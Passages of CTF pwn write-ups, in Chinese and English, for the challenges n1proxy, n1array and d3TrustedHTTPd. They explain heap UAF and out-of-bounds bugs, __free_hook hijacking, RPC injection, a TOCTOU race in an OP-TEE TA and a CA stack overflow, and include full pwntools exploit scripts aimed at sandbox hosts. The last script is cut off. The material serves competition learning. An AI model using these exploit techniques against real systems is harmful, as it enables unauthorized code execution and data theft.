  • 题目使用的是 libc 2.27,所以第一时间考虑直接使用 tcache 覆写 __free_hook 的经典方法,但是具体怎么稳定地将值写上去折腾了老半天。因为 slice::from_raw_parts 的存在,在通过 UAF 覆盖 next 指针之后,程序会在同一个 bin 上申请相同大小的 chunk,并将 iov_base 指针处的值拷贝到其中。实际上如果将 next 覆盖为 __free_hook,那么 slice::from_raw_parts 直接申请到的就是 __free_hook 未知的内存。由于 iov_base 最开头保存的就是 next 指针的值,而 +0x8 的位置在重新 malloc 时会被清空,所以只能把要写入的值放在 +0x10 处,并将 next 指针修改为 __free_hook-0x10。这里还要将 tcache chunk + 0x8 的地方放一个可读可写的地址,来保证检查不出错(至于为什么不用控制为 heap+0x10 也没管太多,反正就是可以),最后再写 system 地址即可劫持 __free_hook 为 system;
  • 最后通过 Send 功能发送 b"cat /home/ctf/flag >&9\x00",并使用同样 0x50 的大小 Recv 接收,即可将 flag 写出到响应给客户端的数据流中。

    • image-20231026170145854

0x03 一些坑

  • Send 功能中,由于题目代码实现的原因,data 和 sig 如果拼接在一起发送的话会导致线程阻塞,也就是认为没有读完;如果分开发送的话,则对 data 有最小长度为 20 个字节的要求,这显然容易破坏一些想要的值;所以采取的方案是拼接 data 和 sig,但是留末尾两个字节分开发送,由于 session_key 使用带有 padding 的块密码加密数据,所以服务端是可以正常读出的,这样就可以保证 data 最短可发送 1 个字节,且不会一直阻塞。

0x04 EXP

from pwnlib.tubes.remote import remote
from pwnlib.util.packing import p8, p16, p32, p64, u8, u16, u32, u64
import pwnlib.log as log
from pwn import *
import rsa
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5, AES
from Crypto.Util.Padding import pad, unpad
from enum import Enum
import threading
import time

context.log_level = "debug"

class ConnType(Enum):
    New = 0
    Restore = 1
    Renew = 2
    Restart = 114514
    Unknown = 3

class ProxyType(Enum):
    Tcp = 0
    Udp = 1
    Sock = 2
    Unknown = 3

class ProxyStatus(Enum):
    Send = 0
    Recv = 1
    Conn = 2
    Close = 3
    Listen = 4
    Unknown = 5

class Client(object):
    def __init__(self):
        self.server_key = None
        
        if os.path.exists("client_key.pem"):
            with open("client_key.pem", "rb") as f:
                self.client_key = RSA.import_key(f.read())
        else:
            self.client_key = RSA.generate(1024)
            self.client_key.has_private()
            with open("client_key.pem", "wb") as f:
                f.write(self.client_key.export_key())

        self.r = remote("chall-4a4554644c7a5349.sandbox.ctfpunk.com", 21496)

        self.state = 0
        self.session_key = ()

    def rsa_decrypt(self, data: bytes) -> bytes:
        if not self.client_key.has_private():
            raise Exception("No private key")
        
        cipher = PKCS1_v1_5.new(self.client_key)
        decrypted = cipher.decrypt(data, None)
        return decrypted

    def rsa_encrypt(self, data: bytes):
        pass

    def aes_encrypt(self, data: bytes) -> bytes:
        key, iv = self.session_key
        cipher = AES.new(key, AES.MODE_CBC, iv)
        encrypted_data = cipher.encrypt(pad(data, AES.block_size))
        return encrypted_data

    def aes_decrypt(self, data: bytes):
        key, iv = self.session_key
        cipher = AES.new(key, AES.MODE_CBC, iv)
        try:
            decrypted_data = unpad(cipher.decrypt(data), AES.block_size)
            return decrypted_data
        except ValueError:
            raise Exception("Invalid padding")

    def send_client_hello(self):
        self.r.recvuntil("n1proxy server v0.1")
        self.r.send("n1proxy client v0.1")

    def send_conn_type(self, type):
        """
        enum ConnType {
            New = 0,
            Restore = 1,
            Renew = 2,
            Restart = 114514,
            Unknown = 3,
        }
        """
        self.r.send(p32(type))

    def verify(self, data: bytes, signature: bytes):
        """
        verify signature from server
        """
        assert self.server_key is not None
        hash_obj = SHA256.new(data)
        verifier = pkcs1_15.new(self.server_key)
        try:
            verifier.verify(hash_obj, signature)
            log.success("Verify server key success")
        except (ValueError, TypeError):
            raise Exception("Invalid server key")

    def sign(self, data: bytes):
        """
        sign data with client private key
        """
        assert self.client_key.has_private()
        signer = pkcs1_15.new(self.client_key)
        hash_obj = SHA256.new(data)
        signature = signer.sign(hash_obj)
        return signature

    def get_server_pubkey(self):
        # key_exchange_sign ->
        # [ len(key_exchange_sign) (8 bytes) | key_exchange_sign (512 bytes) ]
        key_exchange_sign_total = 520
        buf = self.r.recv(key_exchange_sign_total)
        key_exchange_sign_length = u64(buf[:8])
        key_exchange_sign = buf[8:]
        assert(len(key_exchange_sign) == key_exchange_sign_length)

        # key exchange ->
        # [ sizeof(pubkey_n) (8 bytes) | sizeof(pubkey_e) (8 bytes) | pubkey_n (512 bytes) | pubkey_e (3 bytes)]
        key_exchange_total = 531
        key_exchange_buf = self.r.recv(key_exchange_total)
        pubkey_n_length = u64(key_exchange_buf[:8])
        pubkey_e_length = u64(key_exchange_buf[8:16])
        pubkey_n = key_exchange_buf[16:528]
        pubkey_e = key_exchange_buf[528:]
        assert len(pubkey_n) == pubkey_n_length
        assert len(pubkey_e) == pubkey_e_length

        log.info("key_exchange_sign_length: " + str(key_exchange_sign_length))

        pubkey_n = int.from_bytes(pubkey_n, "big")
        pubkey_e = int.from_bytes(pubkey_e, "big")
        
        if self.server_key is None:
            self.server_key = RSA.construct((pubkey_n, pubkey_e))
            self.verify(key_exchange_buf, key_exchange_sign)

        log.success("pubkey_n: " + str(pubkey_n))
        log.success("pubkey_e: " + str(pubkey_e))

    def send_client_pubkey(self):
        """
        * client_msg_len is 8bytes
        """
        data_to_sign = len(self.client_key.n.to_bytes(512, 'big')).to_bytes(8, 'little') + \
                        self.client_key.n.to_bytes(512, 'big') + \
                        len(self.client_key.e.to_bytes(3, 'big')).to_bytes(8, 'little') + \
                        self.client_key.e.to_bytes(3, 'big')
        
        signature = self.sign(data_to_sign)

        packet = len(signature).to_bytes(8, 'little') + signature + data_to_sign
        self.r.send(packet)

    def get_session_key(self):
        """
        session_key_sign [ len(sign) (8 bytes) | sign (512 bytes) ]
        session_key [ len(enc_key) (8 bytes) | enc_key (128 key) | len(enc_time) (8 bytes) | enc_time (128 bytes) ]
        """
        session_key_sign_total = 520
        session_key_sign_buf = self.r.recv(session_key_sign_total)
        session_key_sign_length = u64(session_key_sign_buf[:8])
        session_key_sign = session_key_sign_buf[8:]

        session_key_total = 272
        session_key_buf = self.r.recv(session_key_total)
        enc_key_length = u64(session_key_buf[:8])
        enc_key = session_key_buf[8:136]
        enc_time_length = u64(session_key_buf[136:144])
        enc_time = session_key_buf[144:272]

        assert len(session_key_sign) == session_key_sign_length
        self.verify(session_key_buf, session_key_sign)

        assert len(enc_key) == enc_key_length
        assert len(enc_time) == enc_time_length

        log.info("enc_key_length: " + str(enc_key_length))
        log.info("enc_time_length: " + str(enc_time_length))

        session_key = self.rsa_decrypt(enc_key)
        time_stamp = self.rsa_decrypt(enc_time)
        time_stamp = int.from_bytes(time_stamp, 'big')

        assert len(session_key) == 48
        key = session_key[:32]
        iv = session_key[32:]
        assert len(key) == 32
        assert len(iv) == 16
        self.session_key = (key, iv)

    def recv_ok_msg(self):
        enc_data_len = 528
        enc_data = self.r.recv(enc_data_len)
        data = self.aes_decrypt(enc_data)
        assert len(data) == 524
        ok_msg = data[:4]
        sign_len = u64(data[4:12])
        sign = data[12:]
        assert len(sign) == sign_len
        assert len(sign) == 512
        self.verify(ok_msg, sign)
        log.success(f"recv ok msg : {ok_msg}")

    
    def send_pre_conn(self, proxy_type, proxy_status):
        data = p32(proxy_type) + p32(proxy_status)
        sig = self.sign(data)
        full = data + sig
        enc_data = self.aes_encrypt(full)

        self.r.send(enc_data)

    def proxy_listen(self, hostlen, host, port):
        self.send_pre_conn(ProxyType.Sock.value, ProxyStatus.Listen.value)
        self.recv_ok_msg()
        
        assert len(host) == hostlen
        
        hostlen = p32(hostlen)
        host = host.encode()
        port = p16(port)
        data = hostlen + host + port
        sig = self.sign(data)
        full = data + sig
        enc_data = self.aes_encrypt(full)
        
        self.r.send(enc_data)

        # server's listen thread will block because of waiting accept
        # recv conn fd
        recv_enc_data_len = 528
        recv_enc_data = self.r.recv(recv_enc_data_len)
        recv_data = self.aes_decrypt(recv_enc_data)
        assert len(recv_data) == 516
        sig = recv_data[4:]
        self.verify(recv_data[:4], sig)
        conn_fd = u32(recv_data[:4])

        log.success(f"recv listen fd: {conn_fd}")
        return conn_fd

    def proxy_conn(self, hostlen, host, port) -> int:
        self.send_pre_conn(ProxyType.Sock.value, ProxyStatus.Conn.value)
        self.recv_ok_msg()

        hostlen = p32(hostlen)
        host = host.encode()
        port = p16(port)
        data = hostlen + host + port
        sig = self.sign(data)
        full = data + sig
        enc_data = self.aes_encrypt(full)
        
        self.r.send(enc_data)

        # recv conn fd
        recv_enc_data_len = 528
        recv_enc_data = self.r.recv(recv_enc_data_len)
        recv_data = self.aes_decrypt(recv_enc_data)
        assert len(recv_data) == 516
        sig = recv_data[4:]
        self.verify(recv_data[:4], sig)
        conn_fd = u32(recv_data[:4])

        log.success(f"recv conn fd: {conn_fd}")
        return conn_fd
    
    def proxy_send(self, conn_fd, data_size_u64, data):
        self.send_pre_conn(ProxyType.Sock.value, ProxyStatus.Send.value)
        self.recv_ok_msg()

        assert len(data) == data_size_u64

        conn_fd = p32(conn_fd)
        data_size_u64 = p64(data_size_u64)
        data = conn_fd + data_size_u64 + data
        sig = self.sign(data)
        #full = data + sig
        #enc_data = self.aes_encrypt(full)
        #self.r.send(enc_data)
        self.r.send(self.aes_encrypt(data+sig[:-2]))
        self.r.send(self.aes_encrypt(sig[-2:]))

        # recv send result
        recv_enc_data_len = 528
        recv_enc_data = self.r.recv(recv_enc_data_len)
        recv_data = self.aes_decrypt(recv_enc_data)
        sig = recv_data[8:]
        self.verify(recv_data[:8], sig)
        send_res = u64(recv_data[:8])

        log.success(f"send_res: {send_res}")
        return send_res

    def proxy_recv(self, conn_fd, data_size_u64):
        self.send_pre_conn(ProxyType.Sock.value, ProxyStatus.Recv.value)
        self.recv_ok_msg()

        conn_fd = p32(conn_fd)
        data_size_u64 = p64(data_size_u64)
        data = conn_fd + data_size_u64
        sig = self.sign(data)
        self.r.send(self.aes_encrypt(data+sig))

        recv_enc_data = self.r.recv()
        recv_data = self.aes_decrypt(recv_enc_data)
        data_len = u64(recv_data[:8])
        data = recv_data[8:8+data_len]
        sig = recv_data[8+data_len:]
        self.verify(recv_data[:8+data_len], sig)
        log.success(f"recv_data: {data}")

        return data

    def handshake(self):
        self.send_client_hello()
        self.send_conn_type(0x0)
        self.get_server_pubkey()
        self.send_client_pubkey()
        self.get_session_key()

    def do_close(self):
        self.r.close()

fd_1 = -1
fd_2 = -1

def listen_task():
    global fd_1
    c = Client()
    c.handshake()
    fd = c.proxy_listen(0x8, "hostname", 1213)
    fd_1 = fd
    c.do_close()

def exp():
    global fd_1
    global fd_2

    libc = ELF("./lib/libc.so.6")

    threading.Thread(target=listen_task).start()
    time.sleep(2)

    c1 = Client()
    c1.handshake()
    fd_2 = c1.proxy_conn(0x8, "hostname", 1213)
    c1.do_close()

    print(f"fd_1: {fd_1}, fd_2: {fd_2}")

    c2 = Client()
    c2.handshake()
    c2.proxy_send(fd_2, 0x8, b"\x00"*0x8)
    c2.do_close()

# 0x5555556b4010
# 0x200 -> 0x7ffff758ac00
# 0x450 -> 0x7ffff758b290
# 0x410 -> 0x7ffff758b0b0 | 0x5555556cb660
    #pause()
    c3 = Client()
    c3.handshake()
    leak_data = c3.proxy_recv(fd_1, 0x200)

    tmp_leak = u64(leak_data[:0x8])
    libc_leak = u64(leak_data[0x8:0x10])
    libc_base = libc_leak - 0x3ebca0
    system = libc_base + libc.symbols['system']
    __free_hook = libc_base + libc.symbols['__free_hook']
    binsh = libc_base + next(libc.search(b"/bin/sh\x00"))
    print("tmp_leak:", hex(tmp_leak))
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("__free_hook:", hex(__free_hook))
    print("binsh:", hex(binsh))
    c3.do_close()

    #pause()
    c4 = Client()
    c4.handshake()
    c4.proxy_send(fd_2, 0x18, p64(__free_hook-0x10)+p64(__free_hook-0x20)+p64(system))
    c4.do_close()
    c5 = Client()
    c5.handshake()
    read_data = c5.proxy_recv(fd_1, 0x50)
    print("read_data:", read_data)
    c5.do_close()

    c6 = Client()
    c6.handshake()
    cmd = b"cat /home/ctf/flag >&9\x00"
    c6.proxy_send(fd_2, len(cmd), cmd)
    c6.do_close()
    c7 = Client()
    c7.handshake()
    read_data = c7.proxy_recv(fd_1, 0x50)
    print("read_data:", read_data)
    c7.do_close() 

if __name__ == "__main__":
    exp()

n1array

0x00 题目分析

挺简单的,主要的工作量在于数据结构的逆向,但是居然能抢个一血...
  • 题目大体维护了一个hash表,每个表项对应一个array。每个array有一个 name 用于索引,有一个 type 数组和 value 数组。理论上这两个数组应该等长。
  • 用户在输入的时候,可以输入三种 Atom(name,type,value),顺序不限,次数不限,理论上后输入的会覆盖前输入的,每种 Atom 的结构如下:

    • value atom: | u32 len | u32 type | u32 is_def | u32 default_val | u32 nelts | u32 values * nelts |
      
      type atom : | u32 len | u32 type | u32 nelts | u8 type * nelts |
      
      name atom : | u32 len | u32 type | u32 name_len | char[name_len] name |
  • value 有两种模式,在输入的时候可以选择:

    • 正常数组,用户自己输入每一位的值;
    • default数组,用一个输入的位(记为 is_def)来标记,如果置位,则认为这个数组的所有值都是用户输入的 default 值。且用户无需在后面输入每一位的值,即这个输入占空间很短。
  • parse_value() 中,当先输入一个正常的 value 数组(记为value1),再输入一个 default 数组(记为value2),可以发现,array->value.buf 指向第一个输入的 value1_atom.buf ,但是 array->num 会被置为第二个输入的 value1_atom.nelts ,这就导致了越界读写的风险;

    • image-20231026171538942
    • image-20231026171612347
  • 那么题目就简单了,首先通过溢出读,利用 unsorted_bin 来泄露libc地址,然后是溢出写来劫持 tcache 控制 __free_hook。由于读写地址只能在不对齐的 4 字节中进行,所以需要额外处理一下。

0x01 EXP

from pwn import *

context.log_level = "debug"

#p = process(["./ld-2.31.so", "--preload", "./libc-2.31.so", "./pwn"])
p = remote("chall-6b73445766645053.sandbox.ctfpunk.com", 22258)
libc = ELF("./libc-2.31.so")
#p = process(["./pwn"])

def value_atom(nelts, value:list, is_def=False, def_val=0xdeadbeef):
    # len | type | is_def | def_val | nelts | value
    value_data = b"".join([p32(i) for i in value])
    tmp = p32(1) + p32(1 if is_def else 0) + p32(def_val) + p32(nelts) + value_data
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def type_atom(nelts, type:list):
    # len | type | nelts | type
    type_data = b"".join([p8(_t) for _t in type])
    tmp = p32(2) + p32(nelts) + type_data
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def name_atom(name:bytes):
    # len | type | name_len | name
    tmp = p32(3) + p32(len(name)) + name
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def input_data(atom_data:bytes):
    p.sendlineafter(b"cmd>>", b"0")
    p.recvuntil(b"input data of array atom>>")
    atom_data = p32(0) + atom_data
    p.send(p32(4 + len(atom_data)))
    p.send(atom_data)
    
def print_array(arr_name):
    p.sendlineafter(b"cmd>>", b"1")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)
    
def remove(arr_name):
    p.sendlineafter(b"cmd>>", b"2")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)

def edit_value(arr_name, idx, new_val):
    p.sendlineafter(b"cmd>>", b"3")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)
    p.recvuntil(b"Input Index: \n")
    p.sendline(str(idx).encode())
    p.recvuntil(b"Input New Val: \n")
    p.sendline(str(new_val).encode())
    
def edit_type(arr_name, idx, new_type):
    p.sendlineafter(b"cmd>>", b"4")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)
    p.recvuntil(b"Input Index: \n")
    p.sendline(str(idx).encode())
    p.recvuntil(b"Input New Type: \n")
    p.sendline(str(new_type).encode())
    
def add(arr_name, idx1, idx2):
    p.sendlineafter(b"cmd>>", b"5")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)
    p.recvuntil(b"Input Index1: \n")
    p.sendline(str(idx1).encode())
    p.recvuntil(b"Input Index1: \n")
    p.sendline(str(idx2).encode())

# 0x555555554000+0x5030
# 0x000055555555a2a0

def exp():
    #gdb.attach(p, "b *0x7ffff7fc3000+0x16A4\nc\n")
    paylaod = type_atom(256, [2]*256) + name_atom(b"AAAA\x00") + value_atom(1, [0xabcd]) + value_atom(256, [], True, 0xdeadbeef)
    input_data(paylaod)

    paylaod = type_atom(256, [2]*256) + name_atom(b"BBBB\x00") + value_atom(256, [0xaaaa]*256)
    input_data(paylaod)
    remove(b"BBBB")

    print_array(b"AAAA")

    p.recvuntil(b"array AAAA: ")
    arr_data = p.recvuntil(b"]")
    arr_data = arr_data.replace(b" ", b",").decode()
    arr = eval(arr_data)
    print("get arr: ", arr)
    #print(hex(arr[13]))
    #print(hex(arr[12]))
    #print(hex(arr[11]))
    heap_leak = ((arr[13] & 0xff) << 8*5) | (arr[12] << 8) | ((arr[11] & 0xff000000) >> 8*3)
    libc_leak = ((arr[47] & 0xff) << 8*5) | (arr[46] << 8) | ((arr[45] & 0xff000000) >> 8*3)
    print("heap_leak:", hex(heap_leak))
    print("libc_leak:", hex(libc_leak))
    libc_base = libc_leak - 0x1ecbe0
    system = libc_base + libc.sym["system"]
    free_hook = libc_base + libc.sym["__free_hook"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    print("libc_base:", hex(libc_base))
    print("free_hook:", hex(free_hook))

    paylaod = type_atom(1, [2]*1) + name_atom(b"CCCC\x00") + value_atom(1, [0xaaaa]*1)
    input_data(paylaod)
    paylaod = type_atom(1, [2]*1) + name_atom(b"DDDD\x00") + value_atom(1, [0xaaaa]*1)
    input_data(paylaod)
    remove(b"CCCC")
    remove(b"DDDD")

    print_array(b"AAAA")
    p.recvuntil(b"array AAAA: ")
    arr_data = p.recvuntil(b"]")
    arr_data = arr_data.replace(b" ", b",").decode()
    arr = eval(arr_data)
    print("get arr: ", arr)
    part1 = arr[105]
    part2 = arr[106]
    part3 = arr[107]
    print("part1:", hex(part1))
    print("part2:", hex(part2))
    print("part3:", hex(part3))
    tmp_hook = free_hook-8
    w_part1 = (part1 & 0x00ffffff) | ((tmp_hook & 0xff) << 8*3)
    w_part2 = (tmp_hook & 0x00ffffffff00) >> 8
    w_part3 = (part3 & 0xffffff00) | ((tmp_hook & 0xff0000000000) >> 8*5)
    print("w_part1:", hex(w_part1))
    print("w_part2:", hex(w_part2))
    print("w_part3:", hex(w_part3))
    edit_value(b"AAAA", 105, w_part1)
    edit_value(b"AAAA", 106, w_part2)
    edit_value(b"AAAA", 107, w_part3)

    paylaod = type_atom(1, [2]*1) + name_atom(b"/bin/sh;"+p64(system)) + value_atom(1, [0xaaaa]*1)
    input_data(paylaod)
    #paylaod = type_atom(1, [2]*1) + name_atom(p64(system)) + value_atom(1, [0xaaaa]*1)
    #input_data(paylaod)

    print("free_hook:", hex(free_hook))

    remove(b"/bin/sh;"+p64(system))

    #gdb.attach(p)
    p.interactive()

if __name__ == "__main__":
    exp()

Github Repo:d3ctf-2022-pwn-d3TrustedHTTPd

Author:Eqqie @ D^3CTF

Analysis

This is a challenge about ARM TEE vulnerability exploitation, I wrote an HTTPd as well as an RPC middleware on top of the regular TEE Pwn. The TA provides authentication services for HTTPd and a simple file system based on OP-TEE secure storage. HTTPd is written based on mini_httpd and the RPC middleware is located in /usr/bin/optee_d3_trusted_core, and they are related as follows.

1

To read the log in secure world (TEE) you can add this line to the QEMU args at run.sh.

-serial tcp:localhost:54320 -serial tcp:localhost:54321 \

This challenge contains a lot of code and memory corruption based on logic vulnerabilities, so it takes a lot of time to reverse the program. In order to quickly identify the OP-TEE API in TA I recommend you to use BinaryAI online tool to analyze TA binaries, it can greatly reduce unnecessary workload.

f5da5a5cb1efe21d620a0a63feda4ff

Step 1

The first vulnerability appears in the RPC implementation between HTTPd and optee_d3_trusted_core. HTTPd only replaces spaces with null when getting the username parameter and splices the username into the end of the string used for RPC.

image-20230502220946251

image-20230502221009171

optee_d3_trusted_core considers that different fields can be separated by spaces or \t (%09) when parsing RPC data, so we can inject additional fields into the RPC request via \t.

image-20230502221340781

When an attacker requests to log in to an eqqie user using face_id, the similarity between the real face_id vector and the face_id vector sent by the attacker expressed as the inverse of the Euclidean distance can be leaked by injecting eqqie%09get_similarity.

The attacker can traverse each dimension of the face_id vector in a certain step value (such as 0.015) and request the similarity of the current vector from the server to find the value that maximizes the similarity of each dimension. When all 128 dimensions in the vector have completed this calculation, the vector with the highest overall similarity will be obtained, and when the similarity exceeds the threshold of 85% in the TA, the Face ID authentication can be passed, bypassing the login restriction.

Step 2

In the second step we complete user privilege elevation by combining a TOCTOU race condition vulnerability and a UAF vulnerability in TA to obtain Admin user privileges.

When we use the /api/man/user/disable API to disable a user, HTTPd completes this behavior in two steps, the first step is to kick out the corresponding user using command user kickout and then add the user to the disable list using command user disable.

image-20230502223311793

TEE is atomic when calling TEEC_InvokeCommand in the same session, that is, only when the current Invoke execution is finished the next Invoke can start to execute, so there is no competition within an Invoke. But here, TEEC_InvokeCommand is called twice when implementing kickout, so there is a chance of race condition.

Kickout function is implemented by searching the session list for the session object whose record UID is the same as the UID of the user to be deleted, and releasing it.

image-20230502223709668

Disable function is implemented by moving the user specified by username from the enable user list to the disable user list.

image-20230502224103696

We can use a race condition idea where we first login to the guest user once to make it have a session, and then use two threads to disable the guest user and log in to the guest user in parallel. There is a certain probability that when the /api/man/user/disable interface kicks out the guest user, the attacker gives a new session to the guest user via the /api/login interface, and the /api/man/user/disable interface moves the guest user into the disabled list. After completing this attack, the attacker holds a session that refers to the disabled user.

Based on this prerequisite we can exploit the existence of a UAF vulnerability in TA when resetting users. (I use the source code to show the location of the vulnerability more clearly)

image-20230502225611570

When you reset a user, if the user is already disabled, you will enter the logic as shown in the figure. The user's object is first removed from the user list, and if the set_face_id parameter is specified at reset time, a memory area is requested to hold the new face_id vector. The TA then recreates a user using d3_core_add_user_info. Finally, the TA iterates through all sessions and compares the uid to update the pointer to the user object referenced by the session. But instead of using session->uid when comparing UIDs, session->user_info->uid is used incorrectly. The object referenced by session->user_info has been freed earlier, so a freed chunk of memory is referenced here. If we can occupy this chunk by heap fengshui, we can bypass the updating of the user object reference on this session by modifying the UID hold by user_info object and then make the session refer to a fake user object forged by attacker. Naturally, the attacker can make the fake user as an Admin user.

To complete the attack on this UAF, you can first read this BGET Explained (phi1010.github.io) article to understand how the OP-TEE heap allocator works. The OP-TEE heap allocator is roughly similar to the unsorted bin in Glibc, except that the bin starts with a large freed chunk, which is split from the tail of the larger chunk when allocating through the bin. When releasing the chunk, it tries to merge the freed chunk before and after and insert it into the bin via a FIFO strategy. In order to exploit this vulnerability, we need to call the reset function after we adjust the heap layout from A to B, and then we can use the delete->create->create gadget in reset function. It will make the heap layout change in the way of C->D->E. In the end we can forge a Admin user by controlling the new face data.

image-20230502232518449

Step 3

When we can get Admin privileges, we can fully use the secure file system implemented in TA based on OP-TEE secure storage (only read-only privileges for normal users).

The secure file system has two modes of erase and mark when deleting files or directories. The erase mode will delete the entire file object from the OP-TEE secure storage, while the mark mode is marked as deleted in the file node, and the node will not be reused until there is no free slot.

The secure file system uses the SecFile data structure when storing files and directories. When creating a directory, the status is set to 0xffff1001 (for a file, this value is 0xffff0000). There are two options for deleting a directory, recursive and non-recursive. When deleting a directory in recursive mode, the data in the secure storage will not be erased, but marked as deleted.

typedef struct SecFile sec_file_t;
typedef sec_file_t sec_dir_t;
#pragma pack(push, 4)
struct SecFile{
    uint32_t magic;
    char hash[TEE_SHA256_HASH_SIZE];
    uint32_t name_size;
    uint32_t data_size;
    char filename[MAX_FILE_NAME];
    uint32_t status;
    char data[0];
};
#pragma pack(pop)

There is a small bug when creating files with d3_core_create_secure_file that the status field is not rewritten when reusing a slot that is marked as deleted (compared to d3_core_create_secure_dir which does not have this flaw). This does not directly affect much.

image-20230503003858564

image-20230503003654968

But there is another flaw when renaming files, that is, it is allowed to set a file name with a length of 128 bytes. Since the maximum length of the file name field is 128, this flaw will cause the filename to loss the null byte at the end. This vulnerability combined with the flaw of rewriting of the status field will include the length of the file name itself and the length of the file content when updating the length of the file name. This causes the file name and content of the file to be brought together when using d3_core_get_sec_file_info to read file information.

7ac17a0ea058ffb702e9754be596f8d

070b86d520221b246afa7a1b2598b79

When the d3_core_get_sec_file_info function is called, the pointer to store the file information in the CA will be passed to the TA in the way of TEEC_MEMREF_TEMP_INPUT. This pointer references the CA's buffer on the stack.

image-20230503004650985

12c883cc1a6d7728775b01700b41b2f

617a2c40f860058a6151024fff90ab7

image-20230503011850677

The TEEC_MEMREF_TEMP_INPUT type parameter of CA is not copied but mapped when passed to TA. This mapping is usually mapped in a page-aligned manner, which means that it is not only the data of the size specified in tmpref.size that is mapped to the TA address space, but also other data that is located in the same page. As shown in the figure, it represents the address space of a TA, and the marked position is the buffer parameter mapped into the TA.

image-20230503005412695

In this challenge, the extra data we write to the buffer using d3_core_get_sec_file_info will cause a stack overflow in the CA, because the buffer for storing the file name in the CA is only 128 bytes, as long as the file content is large enough, we can overwrite it to the return address in the CA. Since the optee_d3_trusted_core process works with root privileges, hijacking its control flow can find a way to obtain the content of /flag.txt with the permission flag of 400. Note that during buffer overflow, /api/secfs/file/update can be used to pre-occupy a larger filename size, thereby bypassing the limitation that the content after the null byte cannot be copied to the buffer.

With the help of the statically compiled gdbserver, we can quickly determine the stack location that can control the return address. For functions with buffer variables, aarch64 will put the return address on the top of the stack to prevent it from being overwritten. What we overwrite is actually the return address of the upper-level function. With the help of the almighty gadget in aarch64 ELF, we can control the chmod function to set the permission of /flag.txt to 766, and then read the flag content directly from HTTPd.

image-20230503011343736

image-20230503011458586

Exploit

from pwn import *
from urllib.parse import urlencode, quote
import threading
import sys
import json
import struct
import os
import time

context.arch = "aarch64"
context.log_level = "debug"

if len(sys.argv) != 3:
    print("python3 exp.py ip port")
ip = sys.argv[1]
port = int(sys.argv[2])

def get_conn():
    return remote(ip, port)

def make_post_request(path, body, session_id=None):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    if isinstance(body, str):
        body = body.encode()    
    p = get_conn()
    req = b"POST " + path.encode() + b" HTTP/1.1\r\n"
    req += b"Content-Length: "+ str(len(body)).encode() + b"\r\n"
    if session_id:
        req += b"Cookie: session_id="+ session_id + b";\r\n"
    req += b"\r\n"
    req += body
    p.send(req)
    return p

def leak_similarity(face_data:list):
    done = 0
    similarity = 0.0
    while(done == 0):
        try:
            body = f"auth_mode=face_id&username=eqqie%09get_similarity&face_data={str(face_data)}".encode()
            p = make_post_request("/api/login", body)
            p.recvuntil(b"HTTP/1.1 ")
            if(p.recv(3) == b"400"):
                print("Try leak again...")
                p.close()
                done = 0
                continue
            p.recvuntil(b"session_id=")
            leak = p.recvuntil(b"; ", drop=True).decode()
            p.close()
            similarity = float(leak)
            done = 1
        except KeyboardInterrupt:
            print("KeyboardInterrupt")
            sys.exit(0)
        except Exception as e:
            print("leak error:", e)
            p.close()
    return similarity
   
def login_by_face(face_data:list):
    args = {
        "auth_mode": "face_id",
        "username": "eqqie",
        "face_data": str(face_data)
    }
    body = urlencode(args).encode()
    p = make_post_request("/api/login", body)
    p.recvuntil(b"session_id=")
    session_id = p.recvuntil(b"; Path", drop=True).decode()
    p.close()
    return session_id
    
def login_by_passwd(username, password):
    args = {
        "auth_mode": "passwd",
        "username": username,
        "password": password
    }
    body = urlencode(args).encode()
    try:
        p = make_post_request("/api/login", body)
        p.recvuntil(b"session_id=")
        session_id = p.recvuntil(b"; Path", drop=True).decode()
        p.close()
    except:
        print("no session!")
        session_id = None
    return session_id
    
def disable_user(session_id, user):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    args = {
        "username": user
    }
    body = urlencode(args).encode()
    p = make_post_request("/api/man/user/disable", body, session_id)
    p.recv()
    p.close()
    
def enable_user(session_id, user):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    args = {
        "username": user
    }
    body = urlencode(args).encode()
    p = make_post_request("/api/man/user/enable", body, session_id)
    p.recv()
    p.close()
    
def reset_user(session_id, user, face_data=None):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    if not face_data:
        args = {
            "username": user
        }
    else:
        args = {
            "username": user,
            "option": "set_face_id",
            "face_data": str(face_data)
        }        
    body = urlencode(args).encode()
    p = make_post_request("/api/man/user/reset", body, session_id)
    p.recv()
    p.close()
    
def test_race_resule(session_id):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    p = make_post_request("/api/user", b"", session_id)
    p.recvuntil(b"HTTP/1.1 ")
    http_status = p.recv(3)
    p.close()
    if http_status == b"200":
        return 0
    elif http_status == b"403":
        remain = p.recv()
        if b"Disabled User" in remain:
            return 2
        else:
            return 1
            
def user_info(session_id):
    if isinstance(session_id, str):
        session_id = session_id.encode()
    p = make_post_request("/api/user", b"", session_id)
    p.recvuntil(b"HTTP/1.1 ")
    http_status = p.recv(3)
    if http_status == b"200":
        try:
            p.recvuntil(b"Connection: close\r\n\r\n")
            p.close()
            json_data = p.recvall().decode()
            return json.loads(json_data)
        except:
            p.close()
            return None
    else:
        p.close()
        return None 
        
def secfs_file_man(action: str, session_id: str, **kwargs):
    print(f"[*] secfs_file_man: action [{action}] with args [{kwargs}]")
    if isinstance(session_id, str):
        session_id = session_id.encode()
    if action == "create":
        body = f"filename={kwargs['filename']}&data={kwargs['data']}&parent_id={kwargs['parent_id']}".encode()
        p = make_post_request("/api/secfs/file/create", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
    elif action == "delete":
        body = f"ext_id={kwargs['ext_id']}&del_mode={kwargs['del_mode']}".encode()
        p = make_post_request("/api/secfs/file/delete", body, session_id)
        p.recvuntil(b"\r\n\r\n")
        ret_data = p.recv()
        p.close()
